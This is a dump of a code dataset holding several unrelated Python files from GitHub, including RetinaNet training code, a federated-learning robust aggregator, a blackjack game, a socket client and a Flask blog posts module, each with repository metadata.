PIL images, but current input is Torch.tensor. Transforms might be reordered.')\n currentInputType = None # reset\n\n elif trID in (\n 'ai.models.pytorch.boundingBoxes.RandomClip',\n 'ai.models.pytorch.boundingBoxes.RandomSizedClip'\n ):\n # transforms that work on both PIL.Image and torch.tensor\n if currentInputType == 'tensor':\n transforms_tensor_new.append(tr)\n else:\n transforms_PIL_new.append(tr)\n\n else:\n # unsupported transform\n warnings.append(f'Transform \"{trName}\" is not a recognized option and will be skipped.')\n\n # assemble transforms\n transforms_out = transforms_PIL_new\n\n # insert a ToTensor operation at the right location\n transforms_out.append({\n 'id': 'ai.models.pytorch.boundingBoxes.DefaultTransform',\n 'transform': 'torchvision.transforms.ToTensor'\n })\n transforms_out.extend(transforms_tensor_new)\n return transforms_out, warnings, errors\n\n\n @staticmethod\n def verifyOptions(options):\n # get default options to compare to\n defaultOptions = RetinaNet.getDefaultOptions()\n\n # updated options with modifications made\n if options is None:\n updatedOptions = defaultOptions.copy()\n else:\n if not isinstance(options, dict):\n try:\n options = json.loads(options)\n except Exception as e:\n return {\n 'valid': False,\n 'warnings': [],\n 'errors': [\n f'Options are not in valid JSON format (message: \"{str(e)}\").'\n ]\n }\n updatedOptions = options.copy()\n\n result = {\n 'valid': True,\n 'warnings': [],\n 'errors': []\n }\n\n if not 'defs' in updatedOptions:\n # old version (without GUI formatting): convert first\n updatedOptions, warnings = RetinaNet._convertOldOptions(updatedOptions, defaultOptions)\n result['warnings'].append('Options have been converted to new format.')\n result['warnings'].extend(warnings)\n\n # flatten and fill globals\n updatedOptions = optionsHelper.substitute_definitions(updatedOptions)\n\n # do the verification\n missingClassOptions = optionsHelper.get_hierarchical_value(updatedOptions, ['options', 'general', 'labelClasses'])\n if not isinstance(missingClassOptions, dict):\n updatedOptions['options']['general']['labelClasses'] = \\\n optionsHelper.get_hierarchical_value(defaultOptions, ['options', 'general', 
'labelClasses'])\n #TODO: verify rest\n\n # verify transforms\n transforms_train = updatedOptions['options']['train']['transform']['value']\n transforms_train, w, e = RetinaNet._verify_transforms(transforms_train, True)\n result['warnings'].extend(w)\n result['errors'].extend(e)\n if transforms_train is None:\n result['valid'] = False\n else:\n updatedOptions['options']['train']['transform']['value'] = transforms_train\n\n transforms_inf = updatedOptions['options']['inference']['transform']['value']\n transforms_inf, w, e = RetinaNet._verify_transforms(transforms_inf, False)\n result['warnings'].extend(w)\n result['errors'].extend(e)\n if transforms_inf is None:\n result['valid'] = False\n else:\n updatedOptions['options']['inference']['transform']['value'] = transforms_inf\n\n if result['valid']:\n result['options'] = updatedOptions\n\n return result\n\n\n @staticmethod\n def _init_transform_instances(transform, imageSize):\n '''\n Receives a list of transform definition dicts (or names)\n that are to be applied in order (either during training or\n for inference), and creates class instances for all of them.\n Also prepends a \"Resize\" operation (with the given image size)\n as well as a \"DefaultTransform\" with a \"ToTensor\" operation,\n to convert the image to a torch.Tensor instance.\n Returns a \"Compose\" transform with all the specified transforms\n in order.\n '''\n transforms = [{\n 'id': 'ai.models.pytorch.boundingBoxes.Resize',\n 'size': imageSize\n }]\n transforms.extend(transform)\n\n # check if \"ToTensor\" is needed\n hasToTensor = False\n for tr in transform:\n if tr['id'].endswith('DefaultTransform'):\n if (isinstance(tr['transform'], str) and tr['transform'].endswith('ToTensor')) or \\\n (isinstance(tr['transform'], dict) and tr['transform']['id'].endswith('ToTensor')):\n hasToTensor = True\n break\n\n if not hasToTensor:\n transforms.append({\n 'id': 'ai.models.pytorch.boundingBoxes.DefaultTransform',\n 'transform': {\n 'id': 'torchvision.transforms.ToTensor'\n }\n })\n transformsList = [{\n 'id': 'ai.models.pytorch.boundingBoxes.Compose',\n 'transforms': transforms\n }]\n transform_instances = GenericPyTorchModel.parseTransforms(transformsList)[0]\n return transform_instances\n\n\n\n\n ''' Model training and inference functionalities '''\n\n def train(self, stateDict, data, updateStateFun):\n '''\n Initializes a model based on the given stateDict and a data loader from the\n provided data and trains the model, taking into account the parameters speci-\n fied in the 'options' given to the class.\n Returns a serializable state dict of the resulting model.\n '''\n # initialize model\n model, labelclassMap = self.initializeModel(stateDict, data,\n optionsHelper.get_hierarchical_value(self.options, ['options', 'general', 'labelClasses', 'add_missing', 'value']),\n optionsHelper.get_hierarchical_value(self.options, ['options', 'general', 'labelClasses', 'remove_obsolete', 'value']))\n\n # setup transform, data loader, dataset, optimizer, criterion\n inputSize = (int(optionsHelper.get_hierarchical_value(self.options, ['options', 'general', 'imageSize', 'width', 'value'])),\n int(optionsHelper.get_hierarchical_value(self.options, ['options', 'general', 'imageSize', 'height', 'value'])))\n \n transform = RetinaNet._init_transform_instances(\n optionsHelper.get_hierarchical_value(self.options, ['options', 'train', 'transform', 'value']),\n inputSize\n )\n\n dataset = BoundingBoxesDataset(data=data,\n fileServer=self.fileServer,\n labelclassMap=labelclassMap,\n 
targetFormat='xyxy',\n transform=transform,\n ignoreUnsure=optionsHelper.get_hierarchical_value(self.options, ['options', 'train', 'encoding', 'ignore_unsure', 'value'], fallback=False))\n\n dataEncoder = encoder.DataEncoder(\n minIoU_pos=optionsHelper.get_hierarchical_value(self.options, ['options', 'train', 'encoding', 'minIoU_pos', 'value'], fallback=0.5),\n maxIoU_neg=optionsHelper.get_hierarchical_value(self.options, ['options', 'train', 'encoding', 'maxIoU_neg', 'value'], fallback=0.4)\n )\n collator = collation.Collator(self.project, self.dbConnector, (inputSize[1], inputSize[0],), dataEncoder)\n dataLoader = DataLoader(\n dataset=dataset,\n collate_fn=collator.collate_fn,\n shuffle=optionsHelper.get_hierarchical_value(self.options, ['options', 'train', 'dataLoader', 'shuffle', 'value'], fallback=True)\n )\n\n # optimizer\n optimArgs = optionsHelper.get_hierarchical_value(self.options, ['options', 'train', 'optim', 'value'], None)\n optimArgs_out = {}\n optimClass = get_class_executable(optimArgs['id'])\n for key in optimArgs.keys():\n if key not in optionsHelper.RESERVED_KEYWORDS:\n optimArgs_out[key] = optionsHelper.get_hierarchical_value(optimArgs[key], ['value'])\n optimizer = optimClass(params=model.parameters(), **optimArgs_out)\n\n # loss criterion\n critArgs = optionsHelper.get_hierarchical_value(self.options, ['options', 'train', 'criterion'], None)\n critArgs_out = {}\n for key in critArgs.keys():\n if key not in optionsHelper.RESERVED_KEYWORDS:\n critArgs_out[key] = optionsHelper.get_hierarchical_value(critArgs[key], ['value'])\n criterion = loss.FocalLoss(**critArgs_out)\n\n # train model\n device = self.get_device()\n seed = int(optionsHelper.get_hierarchical_value(self.options, ['options', 'general', 'seed', 'value'], fallback=0))\n torch.manual_seed(seed)\n if 'cuda' in device:\n torch.cuda.manual_seed(seed)\n model.to(device)\n imgCount = 0\n for (img, bboxes_target, labels_target, fVec, _) in tqdm(dataLoader):\n img, bboxes_target, labels_target = img.to(device), \\\n bboxes_target.to(device), \\\n labels_target.to(device)\n\n optimizer.zero_grad()\n bboxes_pred, labels_pred = model(img)\n loss_value = criterion(bboxes_pred, bboxes_target, labels_pred, labels_target)\n loss_value.backward()\n optimizer.step()\n\n # check for Inf and NaN values and raise exception if needed\n if any([\n torch.any(torch.isinf(bboxes_pred)).item(),\n torch.any(torch.isinf(labels_pred)).item(),\n torch.any(torch.isnan(bboxes_pred)).item(),\n torch.any(torch.isnan(labels_pred)).item()\n ]):\n raise Exception('Model produced Inf and/or NaN values; training was aborted. 
Try reducing the learning rate.')\n\n # update worker state\n imgCount += img.size(0)\n updateStateFun(state='PROGRESS', message='training', done=imgCount, total=len(dataLoader.dataset))\n\n # all done; return state dict as bytes\n return self.exportModelState(model)\n\n \n def inference(self, stateDict, data, updateStateFun):\n\n # initialize model\n if stateDict is None:\n raise Exception('No trained model state found, but required for inference.')\n\n # read state dict from bytes\n model, labelclassMap = self.initializeModel(stateDict, data)\n\n # initialize data loader, dataset, transforms\n inputSize = (int(optionsHelper.get_hierarchical_value(self.options, ['options', 'general', 'imageSize', 'width', 'value'])),\n int(optionsHelper.get_hierarchical_value(self.options, ['options', 'general', 'imageSize', 'height', 'value'])))\n \n transform = RetinaNet._init_transform_instances(\n optionsHelper.get_hierarchical_value(self.options, ['options', 'inference', 'transform', 'value']),\n inputSize\n )\n \n dataset = BoundingBoxesDataset(data=data,\n fileServer=self.fileServer,\n labelclassMap=labelclassMap,\n transform=transform)\n dataEncoder = encoder.DataEncoder(minIoU_pos=0.5, maxIoU_neg=0.4) # IoUs don't matter for inference\n collator = collation.Collator(self.project, self.dbConnector, (inputSize[1], inputSize[0],), dataEncoder)\n dataLoader = DataLoader(\n dataset=dataset,\n collate_fn=collator.collate_fn,\n shuffle=False\n )\n\n # perform inference\n response = {}\n device = self.get_device()\n model.to(device)\n imgCount = 0\n for (img, _, _, fVec, imgID) in tqdm(dataLoader):\n\n # TODO: implement feature vectors\n # if img is not None:\n # dataItem = img.to(device)\n # isFeatureVector = False\n # else:\n # dataItem = fVec.to(device)\n # isFeatureVector = True\n dataItem = img.to(device)\n\n with torch.no_grad():\n bboxes_pred_batch, labels_pred_batch = model(dataItem, False) #TODO: isFeatureVector\n bboxes_pred_batch, labels_pred_batch, confs_pred_batch = dataEncoder.decode(bboxes_pred_batch.squeeze(0).cpu(),\n labels_pred_batch.squeeze(0).cpu(),\n inputSize,\n cls_thresh=optionsHelper.get_hierarchical_value(self.options, ['options', 'inference', 'encoding', 'cls_thresh', 'value'], fallback=0.1),\n nms_thresh=optionsHelper.get_hierarchical_value(self.options, ['options', 'inference', 'encoding', 'nms_thresh', 'value'], fallback=0.1),\n numPred_max=int(optionsHelper.get_hierarchical_value(self.options, ['options', 'inference', 'encoding', 'numPred_max', 'value'], fallback=128)),\n return_conf=True)\n\n for i in range(len(imgID)):\n bboxes_pred = bboxes_pred_batch[i]\n labels_pred = labels_pred_batch[i]\n confs_pred = confs_pred_batch[i]\n if bboxes_pred.dim() == 2:\n bboxes_pred = bboxes_pred.unsqueeze(0)\n labels_pred = labels_pred.unsqueeze(0)\n confs_pred = confs_pred.unsqueeze(0)\n\n # convert bounding boxes to YOLO format\n predictions = []\n bboxes_pred_img = bboxes_pred[0,...]\n labels_pred_img = labels_pred[0,...]\n confs_pred_img = confs_pred[0,...]\n if len(bboxes_pred_img):\n bboxes_pred_img[:,2] -= bboxes_pred_img[:,0]\n bboxes_pred_img[:,3] -= bboxes_pred_img[:,1]\n bboxes_pred_img[:,0] += bboxes_pred_img[:,2]/2\n bboxes_pred_img[:,1] += bboxes_pred_img[:,3]/2\n bboxes_pred_img[:,0] /= inputSize[0]\n bboxes_pred_img[:,1] /= inputSize[1]\n bboxes_pred_img[:,2] /= inputSize[0]\n bboxes_pred_img[:,3] /= inputSize[1]\n\n # limit to image bounds\n bboxes_pred_img = torch.clamp(bboxes_pred_img, 0, 1)\n\n\n # append to dict\n for b in range(bboxes_pred_img.size(0)):\n bbox = 
bboxes_pred_img[b,:]\n                    label = labels_pred_img[b]\n                    logits = confs_pred_img[b,:]\n                    predictions.append({\n                        'x': bbox[0].item(),\n                        'y': bbox[1].item(),\n                        'width': bbox[2].item(),\n                        'height': bbox[3].item(),\n                        'label': dataset.labelclassMap_inv[label.item()],\n                        'logits': logits.numpy().tolist(), #TODO: for AL criterion?\n                        'confidence': torch.max(logits).item()\n                    })\n                \n                response[imgID[i]] = {\n                    'predictions': predictions,\n                    #TODO: exception if fVec is not torch tensor: 'fVec': io.BytesIO(fVec.numpy().astype(np.float32)).getvalue()\n                }\n\n            # update worker state\n            imgCount += len(imgID)\n            updateStateFun(state='PROGRESS', message='predicting', done=imgCount, total=len(dataLoader.dataset))\n\n        model.cpu()\n        if 'cuda' in device:\n            torch.cuda.empty_cache()\n\n        return response","repo_name":"microsoft/aerial_wildlife_detection","sub_path":"ai/models/pytorch/boundingBoxes/retinanet.py","file_name":"retinanet.py","file_ext":"py","file_size_in_byte":27416,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"47"}
+{"seq_id":"34419758964","text":"# DFS traversal of a tree\n\nclass Node:\n    def __init__(self, key):\n        self.left = None\n        self.right = None\n        self.val = key\n\n    def DFS(self,root):\n        if root:\n            self.DFS(self,root.left)\n            print(root.val)\n            self.DFS(self,root.right)\n\nroot = Node(1)\nroot.left = Node(2)\nroot.right = Node(3)\nroot.left.left = Node(4)\nroot.left.right = Node(5)\n\nprint (\"Inorder (DFS) traversal of binary tree is -\")\nNode.DFS(Node,root)","repo_name":"karnabhchakraborty/100DaysOfCode","sub_path":"day1/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"30564276112","text":"import json\nimport boto3\n\n\ndef lambda_handler(event, context):\n    print(event)\n    details = event\n    details[\"registered_users\"] = []\n\n    dynamodb = boto3.resource(\"dynamodb\")\n    table = dynamodb.Table(\"eventInfo-GoSports\")\n\n    try:\n        table.put_item(Item=details)\n\n        return {\n            'statusCode': 200,\n            'headers': {\n                'Content-Type': 'application/json',\n                'Access-Control-Allow-Origin': '*'\n            },\n            'body': json.dumps('Booking successful!')\n        }\n    except:\n        return {\n            'statusCode': 400,\n            'headers': {\n                'Content-Type': 'application/json',\n                'Access-Control-Allow-Origin': '*'\n            },\n            'body': json.dumps('Something went wrong!')\n        }\n","repo_name":"kalpit07/GoSports","sub_path":"back-end/gosports-book-event.py","file_name":"gosports-book-event.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"2547856170","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom utils import convert_pca, utils\n\n\nclass nonLinearity(nn.Module):\n    def __init__(self, in_channels, out_channels, bias=False):\n        super(nonLinearity, self).__init__()\n        self.main = torch.nn.Sequential(nn.Conv1d(in_channels, 2 * in_channels, kernel_size=1, bias=bias),\n                                        torch.nn.LeakyReLU(),\n                                        nn.Conv1d(2 * in_channels, out_channels, kernel_size=1, bias=bias))\n\n    def forward(self, x):\n        out = self.main(x)\n        return out\n\n\nclass Affinity(nn.Module):\n    def __init__(self, in_channels, out_channels, bias=False, self_attention=True, eps=0.001, scale=10):\n        super(Affinity, self).__init__()\n\n        self.key_conv = nonLinearity(in_channels, out_channels, bias=bias)\n        if self_attention:\n            self.query_conv = self.key_conv\n        else:\n            self.query_conv = nonLinearity(in_channels, 
out_channels, bias=bias)\n\n        self.eps = eps\n        self.scale = scale\n        self.Threshold = nn.Threshold(self.eps,\n                                      0)  # if n=10 and there are no attackers, each client gets about 0.1; any weight below 1% of 0.1 is discarded\n\n    def forward(self, query, key):\n        q_out = self.query_conv(query)\n        k_out = self.key_conv(key)\n\n        q_out = F.normalize(q_out, dim=1)\n        k_out = F.normalize(k_out, dim=1)\n        attention_scores = torch.bmm(q_out.transpose(1, 2), k_out)\n        attention_scores *= self.scale\n        attention_weights = F.softmax(attention_scores, dim=-1)\n\n        attention_weights = self.Threshold(attention_weights)\n        return attention_weights\n\n\nclass AttentionConv(nn.Module):\n    def __init__(self, in_channels, out_channels, bias=False, eps=0.001, scale=10):\n        super(AttentionConv, self).__init__()\n\n        self.affinity = Affinity(in_channels, out_channels, bias=bias, eps=eps, scale=scale)\n\n        # self.value_conv = nn.Conv1d(in_channels, in_channels, kernel_size=1,\n        #                             bias=bias)\n\n    def forward(self, query, key):\n        v_out = key  # self.value_conv(key)\n        attention_weights = self.affinity(query, key)\n        out = torch.einsum('bqi,bji -> bjq', attention_weights, v_out)\n\n        return out, attention_weights\n\n\nclass AttentionLoop(nn.Module):\n    def __init__(self, in_channels, out_channels, bias=False, nloop=2, eps=0.001, scale=10):\n        super(AttentionLoop, self).__init__()\n\n        self.attention = AttentionConv(in_channels, out_channels, bias=bias, eps=eps, scale=scale)\n        self.nloop = nloop\n\n    def forward(self, query, key):\n        x = query\n        for i in range(self.nloop):\n            x, w = self.attention(x, key)\n        out = x\n        return out\n\n    def getWeight(self, query, key):\n        x = query\n        for i in range(self.nloop):\n            x, w = self.attention(x, key)\n        out = w\n        return out\n\n\nclass Net():\n    def __init__(self, eps=0.005, scale=10):\n        self.hidden_size = 32\n        self.path_to_net = \"./aaa/attention.pt\"\n        self.eps = eps\n        self.scale = scale\n\n    def main(self, deltas: list, model):\n        '''\n        deltas: a list of state_dicts\n\n        return \n        Delta: robustly aggregated state_dict\n\n        '''\n\n        stacked = utils.stackStateDicts(deltas)\n\n        param_trainable = utils.getTrainableParameters(model)\n        param_nontrainable = [param for param in stacked.keys() if param not in param_trainable]\n        for param in param_nontrainable:\n            del stacked[param]\n\n        proj_vec = convert_pca._convertWithPCA(stacked)\n\n        print(proj_vec.shape)\n        model = AttentionLoop(proj_vec.shape[0], self.hidden_size, bias=False, nloop=5, eps=self.eps, scale=self.scale)\n        model.load_state_dict(torch.load(self.path_to_net))\n        model.eval()\n\n        x = proj_vec.unsqueeze(0)\n        beta = x.median(dim=-1, keepdims=True)[0]\n        weight = model.getWeight(beta, x)\n        weight = F.normalize(weight, p=1, dim=-1)\n\n        weight = weight[0, 0, :]\n        print(weight)\n\n        Delta = utils.applyWeight2StateDicts(deltas, weight)\n        # print(Delta)\n\n        return Delta\n","repo_name":"cpwan/Attack-Adaptive-Aggregation-in-Federated-Learning","sub_path":"aaa/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":4236,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"47"}
+{"seq_id":"28718115600","text":"import random\n\n# 2 - 10 as is\n# J, K, Q - 10; Ace - 11 or 1\n\nclass HumanPlayer:\n\tdef __init__(self):\n\t\tself.money = 100\n\t\tself.bet = 0\n\n\tdef betM(self,amount):\n\t\tself.bet = amount\n\n\tdef subBalance(self):\n\t\tself.money = self.money - self.bet\n\n\tdef addBalance(self):\n\t\tself.money = self.money + self.bet\n\n\nclass Cards:\n\tdef __init__(self):\n\t\tself.cards = [(x,y) for x in range(2,15) for y in 
['Dice','Spade','Clubs','Heart']\n\t\tself.myshuffle()\n\n\tdef hit(self):\n\t\treturn self.cards.pop(0)\n\n\tdef myshuffle(self):\n\t\trandom.shuffle(self.cards)\n\ndef main():\n\thuman = HumanPlayer()\n\tprint(\"You start with $100\")\n\twhile True:\n\t\twhile True:\n\t\t\tdeck = Cards()\n\t\t\thumanValue = 0\n\t\t\tcompValue = 0\n\t\t\twhile True:\n\t\t\t\ttry:\n\t\t\t\t\tbetMoney = int(input(\"Enter amount to bet\"))\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"Enter valid input\")\n\t\t\t\telse:\n\t\t\t\t\tif human.money < betMoney:\n\t\t\t\t\t\tprint(\"Not enough funds\")\n\t\t\t\t\telse:\n\t\t\t\t\t\thuman.betM(betMoney)\n\t\t\t\t\t\tbreak\n\t\t\thumanCards = [deck.hit(), deck.hit()]\n\t\t\tcompCards = [deck.hit(), deck.hit()]\n\t\t\tprint(\"Computer's cards are: \")\n\t\t\tprint(compCards[0])\n\t\t\tprint(\"Your cards are: \")\n\t\t\tprint(humanCards[0])\n\t\t\tprint(humanCards[1])\n\t\t\thumanValue = getValue(humanCards)\n\t\t\tprint(\"Your value is \" + str(humanValue))\n\t\t\tcompValue = getValue(compCards)\n\t\t\tprint(\"Computer value is \" + str(compValue))\n\t\t\twhile True:\n\t\t\t\tres = input(\"HIT OR STAY?\")\n\t\t\t\tif res == \"HIT\":\n\t\t\t\t\thumanCards.append(deck.hit())\n\t\t\t\t\thumanValue = getValue(humanCards)\n\t\t\t\t\tprint(\"Your value is \" + str(humanValue))\n\t\t\t\t\tif humanValue > 21:\n\t\t\t\t\t\tbreak\n\t\t\t\telif res == \"STAY\":\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Enter valid input\")\n\n\t\t\tif humanValue > 21:\n\t\t\t\tprint(\"You exceeded 21, you lost\")\n\t\t\t\thuman.subBalance()\n\t\t\t\tbreak\n\t\t\tprint(\"Dealer is playing\")\n\t\t\twhile compValue < 17:\n\t\t\t\tcompCards.append(deck.hit())\n\t\t\t\tcompValue = getValue(compCards)\n\t\t\t\tprint(\"Computer value is \" + str(compValue))\n\t\t\tif compValue > 21 or humanValue > compValue:\n\t\t\t\thuman.addBalance()\n\t\t\t\tprint(\"You won! Your total amount is now \" + str(human.money))\n\t\t\telse:\n\t\t\t\thuman.subBalance()\n\t\t\t\tprint(\"You lost! Your total amount is now \" + str(human.money))\n\t\t\tbreak\n\t\tplayAgain = input(\"Do you want to play again?\")\n\t\tif playAgain == 'NO':\n\t\t\tbreak\n\n\t\t\ndef getValue(cards):\n\tvalue = 0\n\taceCount = 0\n\tfor c in cards:\n\t\tif c[0] >= 2 and c[0] <= 10:\n\t\t\tvalue += c[0]\n\t\telif c[0] >= 11 and c[0] <= 13:\n\t\t\tvalue += 10\n\t\telse:\n\t\t\taceCount += 1\n\tfor i in range(0, aceCount):\n\t\tif value + 11 <= 21:\n\t\t\tvalue += 11\n\t\telse:\n\t\t\tvalue += 1\n\tprint(cards)\n\treturn value\n\t\n\n\n\nif __name__ == '__main__':\n\tmain()\n\n","repo_name":"javaComSci/BlackJack","sub_path":"blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"31454160326","text":"'''\nCreated on Feb 9, 2016\n\n@author: rajeev.kumar\nDescription :Delete user bundle(custom)\nTest Flow :1)Login as an Admin user and delete existing bundles.\n\n'''\nfrom globalImports import *\n\ntc_id=utility.get_tc_data(__file__)\n\nclass Testcase(Manager.Manager): \n    \"\"\"\n    Delete user bundle(custom)\n    \"\"\"\n    \n    def __init__(self, *args, **kwargs):\n        \"\"\"\n        Initialization\n        \"\"\"\n        Manager.Manager.__init__(self, tc_id, *args, **kwargs)\n    \n    @BaseClass.TestBase.func_exec\n    def test_functionality(self): \n        \"\"\"\n        This is the execution starting function\n        \"\"\"\n        self.browserObject = globalVars.browserObject\n        \n        #Login as Admin user\n        self.verifyCurrentUser(userRole='Administrator', loginAsUser=True)\n        \n        self.getCustomBundle_DeleteCustom(\"Repositories\")\n        self.logout()","repo_name":"baoshuang/29-may-2017-h","sub_path":"GUI/gui-automation-ASMvNext84UI/tests/Testcase_NGI-TC-3188.py","file_name":"Testcase_NGI-TC-3188.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"28345633988","text":"import socket\nimport time\n\nHEADER = 64\nPORT = 5050\nFORMAT = 'utf-8'\nSERVER = socket.gethostbyname(socket.gethostname()) \nADDR = (SERVER, PORT)\n\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient.connect(ADDR)\n\ndef send(msg):\n    \"\"\"Sends a message to the server.\"\"\"\n    message = msg.encode(FORMAT)\n    msg_length = len(message)\n    send_length = str(msg_length).encode(FORMAT)\n    send_length += b' ' * (HEADER - len(send_length))\n    client.send(send_length)\n    client.send(message)\n    return client.recv(2048).decode(FORMAT)\n\ntotal_on_time = 0\ndevice_on_time = 0\ndevice_is_on = False\n\ndef turn_off_device():\n    global total_on_time, device_on_time, device_is_on\n    if device_is_on:\n        response = send(\"turn off\")\n        if response == \"Device state is now: off\":\n            device_off_time = time.time()\n            total_on_time += device_off_time - device_on_time\n            print(\"Device was turned ON for: {:.2f} seconds\".format(device_off_time - device_on_time))\n            device_is_on = False\n    else:\n        print(\"Device is already off.\")\n\n\n\ndef turn_on_device():\n    global total_on_time, device_on_time, device_is_on\n    if not device_is_on:\n        response = send(\"turn on\")\n        if response == \"Device state is now: on\":\n            device_on_time = time.time()\n            device_is_on = True\n            print(\"Device is now ON\")\n    else:\n        print(\"Device is already on.\")\n\n\n\n\ndef quit_program():\n    global total_on_time\n    if device_is_on:\n        turn_off_device()\n    print(\"Total Device On-Time: {:.2f} seconds\".format(total_on_time))\n    send(\"quit\")\n    exit()\n\n\n\ndef get_user_input():\n    user_input = input(\"Do you want to turn on, 
turn off, or set a schedule for the device? \\n\")\n return user_input\n\n\n\ndef schedule_device_action(action_func, time_to_wait):\n print(f\"Scheduling device {action_func.__name__} in {time_to_wait:.2f} seconds.\")\n time.sleep(time_to_wait)\n action_func()\n\n\n\ndef schedule():\n while True:\n action = input(\"Do you want to schedule the device to turn on? (yes/no) \\n \").lower()\n if action not in [\"yes\", \"no\"]:\n print(\"Invalid input. Please enter 'yes' or 'no'.\")\n return\n\n if action == \"no\":\n break\n\n time_unit = input(\"Do you want to set the schedule in hours or minutes? \").lower()\n if time_unit not in [\"hours\", \"minutes\"]:\n print(\"Invalid input. Please choose 'hours' or 'minutes'.\")\n return\n\n time_conversion = 60 if time_unit == \"minutes\" else 3600 # Conversion factor\n\n start_time = int(input(f\"Enter the starting point in {time_unit}: \"))\n end_time = int(input(f\"Enter the ending point in {time_unit}: \"))\n\n start_time_seconds = start_time * time_conversion\n end_time_seconds = end_time * time_conversion\n\n if action == \"yes\":\n schedule_device_action(\n action_func=turn_on_device,\n time_to_wait=start_time_seconds,\n )\n schedule_device_action(\n action_func=turn_off_device,\n time_to_wait=end_time_seconds - start_time_seconds,\n )\n \n break\n\nwhile True:\n user_input = get_user_input()\n\n if user_input == \"turn on\":\n if not device_is_on:\n response = send(\"turn on\")\n if response == \"Device state is now: on\":\n device_on_time = time.time()\n device_is_on = True\n print(\"Device is now ON\")\n elif user_input == \"turn off\":\n turn_off_device()\n elif user_input == \"schedule\":\n schedule()\n elif user_input == \"quit\":\n quit_program()\n else:\n print(\"Invalid input.\")\n","repo_name":"Haseeb1919/schedule-socket-demo","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1309864311","text":"\"\"\"\nChiper.Posts\n\nThis module handles the endpoints for post creation, editing, liking.\nIt also handles the same operations for comments (except editing).\n\"\"\"\n\nfrom flask import Blueprint, flash, redirect, render_template, request, url_for\nfrom flask_login import current_user\nfrom werkzeug.exceptions import abort\n\nfrom chirper.auth import login_required\nfrom chirper.database import Comment, Post, db\nfrom chirper.forms import CommentForm, PostForm\n\nbp = Blueprint('posts', __name__, url_prefix='/posts')\n\n\ndef get_one_post(id, check_author=True):\n \"\"\"\n Params::\n\n id: (int) Id of the post to be returned\n\n check_author: (bool) Bypass author check. For moderator access.\n\n Returns::\n\n Post: Post object with the data of the given post id\n\n HTTPException:\n\n 404: Post does not exits\n\n 403: Not authorized \n \"\"\"\n\n post = Post.query.get(int(id))\n\n if post is None:\n abort(404, f'Post id {id} does not exist.')\n\n if check_author and post.author_id != current_user.id:\n abort(403)\n\n return post\n\n\n@bp.route('/', methods=['GET', 'POST'])\n@login_required\ndef post_page(id):\n \"\"\"\n Endpoint: posts/\n\n Handles : GET, POST\n\n Post page. 
Contains posts like index but also shows and lets you send comments\n \"\"\"\n\n post = Post.query.filter_by(id=id).first_or_404()\n comments = post.comments\n comment_form = CommentForm()\n\n if comment_form.validate_on_submit():\n new_comment = Comment(\n post_id=post.id,\n author_id=current_user.id,\n body=comment_form.body.data\n )\n db.session.add(new_comment)\n db.session.commit()\n flash('Comment has been added!', category='info')\n return redirect(url_for('posts.post_page', id=post.id))\n\n return render_template('posts/post.html', post=post, comments=comments, comment_form=comment_form)\n\n\n@bp.route('/comment//delete')\n@login_required\ndef delete_comment(id):\n \"\"\"\n Endpoint: comment//delete\n\n Handles : GET, POST\n\n API endpoint for deleting comments. Needs authorization of the poster\n \"\"\"\n\n comment = Comment.query.filter_by(id=id).first_or_404()\n\n if current_user.id == comment.author_id:\n db.session.delete(comment)\n db.session.commit()\n return redirect(request.referrer)\n\n\n@bp.route('/comment//')\n@login_required\ndef like_comment(id, action):\n \"\"\"\n Endpoint: comment//like\n\n Handles : GET, POST\n\n API endpoint for liking comments.\n \"\"\"\n\n comment = Comment.query.filter_by(id=id).first_or_404()\n\n if action == 'like':\n current_user.like_comment(comment)\n elif action == 'unlike':\n current_user.unlike_comment(comment)\n\n db.session.commit()\n return redirect(request.referrer)\n\n\n@bp.route('/create', methods=['GET', 'POST'])\n@login_required\ndef create():\n \"\"\"\n Endpoint: posts/create\n\n Handles : GET, POST\n\n Post creation page.\n \"\"\"\n\n if not current_user.is_authenticated:\n flash('You are not logged in!', category='danger')\n return redirect(url_for('auth.login'))\n\n post_form = PostForm()\n\n if post_form.validate_on_submit():\n new_post = Post(author_id=current_user.id,\n title=post_form.title.data,\n body=post_form.body.data\n )\n db.session.add(new_post)\n db.session.commit()\n flash('Post has been created!', category='info')\n return redirect(url_for('index'))\n\n return render_template('posts/create.html',\n form=post_form)\n\n\n@bp.route('//edit', methods=['GET', 'POST'])\n@login_required\ndef edit(id):\n \"\"\"\n Endpoint: posts//edit\n\n Handles : GET, POST\n\n Post editing page, author can change the contents of the post or delete it\n \"\"\"\n\n post = get_one_post(id)\n post_form = PostForm()\n\n if post_form.validate_on_submit():\n\n if post_form.delete.data:\n db.session.delete(post)\n db.session.commit()\n flash('Post has been deleted!', category='danger')\n return redirect(url_for('index'))\n\n post.title = post_form.title.data\n post.body = post_form.body.data\n\n db.session.commit()\n flash('Post has been updated!', category='info')\n next_page = request.args.get('next')\n\n return redirect(next_page or url_for('posts.post_page', id=post.id) or url_for('index'))\n else:\n post_form.title.data = post.title\n post_form.body.data = post.body\n return render_template('posts/edit.html', form=post_form, post=post)\n\n\n@bp.route('//delete', methods=['POST', 'GET'])\n@login_required\ndef delete(id):\n \"\"\"\n Endpoint: posts//delete\n\n Handles : POST\n\n API endpoint for deleting posts. 
